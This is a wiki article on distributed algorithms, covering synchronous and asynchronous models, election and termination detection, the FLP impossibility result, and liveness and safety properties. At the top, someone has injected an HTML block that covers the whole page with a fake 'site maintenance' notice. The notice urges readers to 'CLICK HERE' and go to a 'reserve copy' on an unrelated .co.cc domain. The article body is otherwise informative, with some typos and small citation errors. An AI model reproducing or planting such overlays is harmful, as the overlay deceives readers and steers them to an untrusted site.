Distributed Algorithm

----
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
----
=[http://ujybyqum.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
----
=[http://ujybyqum.co.cc CLICK HERE]=
----
</div>
A '''distributed algorithm''' is an decentralized algorithm that is executed in a [[Distributed System|distributed system]], on more than one machine, node or processor.

== Definition ==

A distributed algorithm for a collection P of processes is, according to Gerard Tel and his book ''Introduction to Distributed Algorithms'', simply a collection of local algorithms, one for each process in P. In his 
earlier work ''Topics in Distributed Algorithms'' he defined it as follows: &quot;a distributed algorithm executes
as a collection of sequential processes, all executing their part of the algorithm independently, but 
coordinating their activity through communication.&quot; Nancy A. Lynch argues &quot;Distributed algorithms are algorithms 
designed to run on hardware consisting of many interconnected processors. The algorithms are supposed to work 
correctly, even if the individual processors and communication channels operate at different speeds and even if
some of the components fail.&quot;

In sequential algorithms steps are taken in a strict sequence and well-defined order. In distributed systems
steps are taken in a strict sequence only locally, gloablly the sequence of steps depends on the
transmission of messages and can be unpredictable. The order of events is not always well-defined,
and failures make the situation even worse.
Nearly all distributed algorithms are based on more or less sophisticated communication through message passing. Since a [[Distributed System|distributed system]] consists of many nodes, processors or processes interconnected by a message passing network, any algorithm which involves more than one node must use some form of message passing, if there is no [[Distributed Shared Memory|distributed shared memory]] or other way of [[Interprocess Communication|interprocess communication]]. The complexity analysis of distributed algorithms involves therefore usually the attempt to measure the total number of messages.

Distributed algorithms are to sequential algorithms what Einstein's physics is to Newton's physics:
sequential algorithms are a special, simplified case of distributed algorithms, and in
distributed alogrithms there is no global time or common clock, and the observer and speed
may influence causality. There are more similarities: for instance according to F. Mattern, the Lorentz 
transformation corresponds roughly to the Rubberband transformation which leaves causality invariant.

== Different Forms and Types ==

=== Asynchronous and Synchronous ===

In general, one can distinguish between asynchronous and synchronous algorithms, as Nancy Lynch does in her book.
In asynchronous algorithms, the nodes and processes are not acting at the same time, no timing assumptions
exist and messages can have an arbitrary delay, while in synchronous algorithms the nodes are acting in lockstep
at the same time. Asynchronous algorithms are not synchronized, they are not occurring at predetermined or 
regular intervals, and messages can be delivered in any order.

Totally synchronous algorithms are easy to handle, because they all nodes act like
a single node at the same time, but they are not practical. They are difficult to justify 
in real-world situations and difficult to achieve in general distributed systems, because there 
is no absolute global time in general, unsynchronized processes operate at different speeds and 
messages have often a considerable time delay.
In summary, systems with pure synchrony (perfect timing) or no faults at all would be nice,
but they are not realistic: nodes and links fail, and messages may have a time delay.

Totally asynchronous algorithms are powerful in theory, because they are meant to work with 
arbitrary time delay, but they are notoriously difficult to design as well. They are 
often very hard or even impossible to construct, because they are too general
(for example a node which sends arbitrary slow messages is indistinguishable 
from a node that really failed).
Some problems proved impossible or expensive in the fully asynchronous model can 
indeed be solved in practice.
Therefore elegant theoretical assumptions such as pure asynchrony 
(no timing assumptions whatsoever), or Byzantine faults (no assumptions limiting faulty behavior)
are not practical, too, they lead to pessimistic and frustrating results that are not useful 
for complex real world systems.

Real systems are complex, they tend to fall somewhere in between the two extreme classes 
of full synchrony and full asynchrony, for example asynchronous systems with
finite average response times or upper bounds for message delivery times.

=== Topologies and Graphs ===

Besides asynchronous and synchronous forms, one can differentiate further between algorithms for particular topologies 
(rings, trees, etc.). There are also a number of [[Distributed Graph Algorithm]]s, which is not surprising, because nearly all [[Distributed System|distributed systems]] based on message passing can be described by a graph (except those who use only some form of shared common memory). 

=== Fundamental algorithms ===

A fundamental block used in many distributed algorithms are tokens (which circulate in rings) and
waves (which spread through arbitrary topologies). A token which moves through a ring can
be considered as a wave for a ring topology. The importance of waves is not surprising, since a wave is 
one of the most basic forms of [[Emergence|emergence]] in a system. If all nodes are visited 
sequentially, or an action like &quot;inform all&quot; or &quot;query all&quot; is required, a kind of wave must be used. 
Fundamental algorithms where all nodes of a network are visited are [[Total Algorithm]]s and 
[[Heart Beat Algorithm]]s.

A common problem besides &quot;inform all&quot; and &quot;query all&quot; is &quot;select one&quot;, &quot;elect one&quot;, &quot;admit one&quot;, etc.
The resulting algorithms are named [[Election Algorithm|election algorithms]], where a single node or 
process (for example the leader) that is to play a distinguished role in a subsequent computation must 
be (s)elected. Further typical algorithms in this area are distributed [[mutal exclusion]] and 
[[deadlock detection]] algorithms, where the concurrent use of un-shareable resources must be 
avoided.

Finally it is problem to determine and change the &quot;global state&quot; or the &quot;global order&quot;, the associated
distributed algorithms are named [[Termination Detection|termination detection]], where the end of a 
distributed computation has to be detected, and distributed [[garbage collection]], where unused memory and 
references must be released. A basic &quot;toy&quot; algorithm used to explain distributed algorithms 
in classes is the [[Distributed GCD Algorithm|distributed GCD algorithm]].

== Problems and Difficulties ==

=== Uncertainties and Failures ===

Distributed algorithms are like [[Distributed System|distributed systems]]
hard to understand and hard to design, because of their high complexity.
Algorithms are the step-by-step definitions of computations,
detailed instructions, rules and recipes for producing a solution 
to a given problem in a finite number of steps.
The problem with many real [[Distributed System|distributed systems]] is 
that every node and every link can fail at any time, messages
can get lost or arrive with an arbitrary time delay.
One cannot say for sure what will happen in the next step. 
One can specify the behavior for each node, but the overall global
behavior which results from the local interactions is often
hard to predict.

The accidental or intended [[Emergence|emergence]] of a 
desirable behavior is more the exception than the rule.
Analysis, design, verification and correctness proofs of 
distributed algorithms are difficult issues. Among the different 
types of uncertainties and difficulties are for example 
(according to Nancy Lynch, 1996):

# processor and link failures (node or message loss)
# uncertain message delivery (arbitrary transmisson time)
# unknown message ordering
# unknown network topologies
# unknown number of processors

Some problems which are characteristic and unique for distributed algorithms are

# [[Race Condition|race conditions]] (where the result depends on the timing of events)
# deadlock detection, esp. phantom- or pseudo-deadlocks 
# termination detection

The detection if a centralized, serial or non-distributed algorithm 
is terminated is trivial, since there is only one
processor, one clock and one well-defined state or time.
The detection if a distributed algorithm is terminated or 
not is a problem of its own, since there is no global state or time in 
a general [[Distributed System|distributed system]]. Another
problem which occurs in distributed algorithms but not in serial
ones is deadlock: mutual blocking of processes, where each process
is waiting for a resource one of the other processes holds.
Obviously it does not occur in serial algorithms for one processors,
and was first met in implementing operating systems.

=== Problem Fields ===

Termination detectection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is &quot;consistent&quot; if it appears as if it were take at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a &quot;logical time&quot; or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but the real time is uniformly continuous, whereas the logical time can have discontinuous jumps. But these methods are problematical and doubtful, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this method ignores &quot;the different failure modes and basic indeterminacy inherent in distributed computing&quot; and leads to systems that are neither reliable and nor scalable.

Thus we have roughly the following problem fields:

# Attempts to imitate local computing (Synchronous Communication or Synchronization, Logical Time)
# Attempts to determine global state  (Global Snapshots, Deadlock Detection, Termination)
# Attempts to reach unified state (Agreement or Consensus)
# Attempts to coordinate access (Contention Problems as Election and Mutual Exclusion)

=== Impossibility Results ===

Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guaranty about achieving of a common consensus impossible, as the famous  &quot;FLP impossibility argument&quot; says. The &quot;FLP impossibility result&quot; or &quot;FLP impossibility argument&quot; from Fisher, Lynch and Patterson says it is impossible to reach consensus in a distributed, asynchronous systems if only one process is faulty. To be more precise it says there is no guruantee a common consensus can be reached, if a faulty process exists. This fact is intuitive plausible, since a faulty process that is not responding anymore is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connection of the asynchronous network).

Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problem in [[Distributed Computing|distributed computing]], where several process have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be commited or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in &quot;Chapter 12&quot; Consensus of her book), &quot;the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all.&quot;

== Proof and Verification ==

The design and verification of distributed programs and algorithms is without 
doubt a very difficult task. A common way to verify distributed algorithms
despite these difficulties is to verify liveness and safety properties.
The traditional definition of liveness and safety are:

* '''Liveness''' means &quot;something good will eventually occur&quot; or &quot;something good eventually happens&quot;
* '''Safety''' means &quot;something bad will never happen&quot; or &quot;no bad thing ever happens&quot;

Liveness and safety are two complementary properties, one says that
the system is changing, the other that the system is not changing. One
claims that the program never enters an unacceptable state, the other
assumes that the program always enters a desirable state after a finite 
number of steps.

=== Liveness ===

Liveness implies that the '''system is changing'''. There is a guarantee of progress, 
which in turn is guaranteed by lack of deadlocks, the absence of infinite 
loops and the ensurance of termination. It is a property stating that eventually 
(after a finite number of steps) some requirement holds. The program eventually enters a desirable 
state, and some assertion will eventually hold. In other words, every computation contains 
finally a state where a certain assertion is true. A liveness requirement requires that some 
property in some configuration which is reachable will eventually hold in every execution.
Typical liveness properties are
* Program termination: the algorithm will terminate in a finite amount of time
* Upper/Lower bounds: a numerical value or parameter must reach a certain upper (lower) bound (in this case liveness can be proved if the value is monotonically increasing or (decreasing), and never remains constant for an infinite amount of time)

=== Safety ===

Safety implies the '''system does not change''', it means that the program does nothing wrong, 
and there is a guarantee that no bad or evil change takes place, which in turn is often proved 
by invariants. Invariants are assertions that always hold during the execution
of the algorithms and are not affected by any action or operation of the algorithm.
An invariant property must hold in every execution and in each reachable 
configuration. Safety properties specify that 'something bad never happens',
the program never enters an unacceptable state and some assertion always holds.
In other words, a certain assertion is true in every state of every
computation of the algorithm. Typical safety properties are
(see Owicki and Lamport, [http://research.microsoft.com/users/lamport/pubs/liveness.pdf Proving Liveness Properties of Concurrent Programs])
* Partial correctness: if the algorithm begins with the precondition true, then it can never terminate with the postcondition false.
* Absence of deadlock: the algorithm never enters a state in which no further progress is possible.
* Absence of infinite loops: the algorithm never enters a state where one or more processes are involved in an infinite loop
* Mutual exclusion: two different processes are never in their critical sections at the same time.

== Articles and Papers ==

Many classic publications from Leslie Lamport can be found on his [http://research.microsoft.com/users/lamport/pubs/pubs.html website] at Microsoft Research. Papers from Edsger W. Dijkstra can be found in the [http://www.cs.utexas.edu/users/EWD/ Dijkstra archives].

General:

[http://www.sunlabs.com/techrep/1994/abstract-29.html A Note on Distributed Computing], Jim Waldo et al., Sun Technical Report (1994) TR-94-29

Impossibility Theorems and Results:

[http://portal.acm.org/citation.cfm?id=214121 Impossibility of distributed consensus with one faulty process] M. Fisher, N. Lynch, and M. Patterson, Journal of the ACM, Vol. 32 No. 2 April (1985) 274-382

[http://doi.ieeecomputersociety.org/10.1109/MC.1992.10061 The Many Faces of Consensus in Distributed Systems] John Turek and Dennis Shasha, IEEE Computer Vol. 25 No. 6 (1992) 8-17

[http://citeseer.ist.psu.edu/572373.html A Hundred Impossibility Proofs for Distributed Computing] Nancy Lynch 

[http://citeseer.ist.psu.edu/623509.html Hundreds of Impossibility Results for Distributed Computing]
Faith Fich and Eric Ruppert

== Books ==

* Nancy A. Lynch, ''Distributed Algorithms'', Morgan Kaufmann 1996, ISBN 1558603484

* Gerard Tel, ''Introduction to Distributed Algorithms'', Cambridge University Press, 2nd edition, 2001, ISBN 0521794838

* Gerard Tel, ''Topics in Distributed Algorithms'', Cambridge University Press, 1991, ISBN 0521403766

* Valmir C. Barbosa, ''An Introduction to Distributed Algorithms'', The MIT Press, 1996, ISBN 0262024128

* Michel Raynal, ''Distributed algorithms and protocols'', John Wiley and Sons, 1988, ISBN 0471917540

* Hagit Attiya and Jennifer Welch, ''Distributed Computing'', John Wiley and Sons, Inc., 2nd edition, 2004, ISBN 0471453242

* Friedemann Mattern, ''Verteilte Basisalgorithmen'', Springer, 1989, ISBN 3540518355

== Lectures == 

Lecture in German from Hans P. Reiser and Rüdiger Kapitza, University Erlangen-Nuremberg

2003
[http://www4.informatik.uni-erlangen.de/Lehre/WS03/V_VA/Skript/]

Lectures in German from Prof. Dr. Friedemann Mattern, ETH Zurich

1999/2000
[http://www.vs.inf.ethz.ch/edu/WS9900/VA/]

2001/2002
[http://www.vs.inf.ethz.ch/edu/WS0102/VA/]

2002/2003
[http://www.vs.inf.ethz.ch/edu/WS0203/VA/]

2003/2004
[http://www.vs.inf.ethz.ch/edu/WS0304/VA/]

2004/2005
[http://www.vs.inf.ethz.ch/edu/WS0405/VA/]